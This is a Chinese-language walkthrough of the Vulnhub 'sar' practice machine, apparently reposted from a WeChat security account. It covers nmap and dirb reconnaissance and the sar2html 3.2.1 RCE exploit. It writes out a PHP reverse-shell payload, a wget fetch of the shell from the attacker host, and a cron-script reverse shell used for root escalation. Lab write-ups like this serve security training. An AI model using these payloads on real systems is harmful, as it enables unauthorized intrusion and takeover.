SAR
主机发现与端口扫描
主机发现
使用 nmap 对目标网段 172.16.20.0/24 进行存活主机扫描,发现目标主机 172.16.20.117
nmap -sP 172.16.20.0/24
扫描端口
进一步扫描目标主机的开放端口和服务版本:
nmap -sV -p- 172.16.20.117
显示 80/tcp 端口运行 Apache 2.4.29。
Web渗透与目录枚举
访问目标IP的HTTP服务,发现默认页面。
枚举目录
通过目录扫描工具 dirb 枚举潜在路径:
dirb http://172.16.20.117/
index.html、phpinfo.php、robots.txt、server-status
http://172.16.20.117/robots.txt
http://172.16.20.117/sar2HTML/
关键发现:
robots.txt:提示禁止爬取的目录。
sar2HTML/: 存在 sar2html 3.2.1 应用,该版本存在已知漏洞。
历史漏洞利用
通过 searchsploit 查找 sar2html 的公开漏洞:
searchsploit sar2
发现漏洞 sar2html 3.2.1 - 'plot' 远程代码执行(RCE)(漏洞编号:49344)。下载利用脚本:
searchsploit sar2 -m 49344.py
反弹shell远程命令执行
执行脚本并注入反弹Shell代码:
python 49344.py
http://172.16.20.117/sar2HTML/index.php
ls
反弹shell
<?php system("bash -c 'bash -i &>/dev/tcp/172.16.20.106/8888 0>&1'");?>
在攻击机上监听端口 8888。
nc -lvnp 8888
python -m http.server 8000
wget http://172.16.20.106:8000/shell.php
ls
访问shell
成功获取反向Shell。
http://172.16.20.117/sar2HTML/shell.php
权限提升(提权)
分析Web目录权限
进入 /var/www/html 发现 finally.sh 和 write.sh 由 root 定期执行,但 write.sh 对普通用户可写。
cd /var/www/html
ls -l
-rwxr-xr-x 1 root root 22 Oct 20 2019 finally.sh
-rw-r--r-- 1 www-data www-data 10918 Oct 20 2019 index.html
-rw-r--r-- 1 www-data www-data 21 Oct 20 2019 phpinfo.php
-rw-r--r-- 1 root root 9 Oct 21 2019 robots.txt
drwxr-xr-x 4 www-data www-data 4096 May 7 12:12 sar2HTML
-rwxrwxrwx 1 www-data www-data 30 Oct 21 2019 write.sh
查看文件
cat finally.sh
#!/bin/sh
./write.sh
cat write.sh
#!/bin/sh
touch /tmp/gateway
篡改定时任务
向 write.sh 追加反弹Shell命令,监听新端口 7777:
echo"/bin/bash -c 'bash -i >& /dev/tcp/172.16.20.106/7777 0>&1'" >> write.sh
监听端口
nc -lnvp 7777
提权成功
原文始发于微信公众号(泷羽Sec-Ceo):靶场奇妙记之Vulnhub sar 靶场练习
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论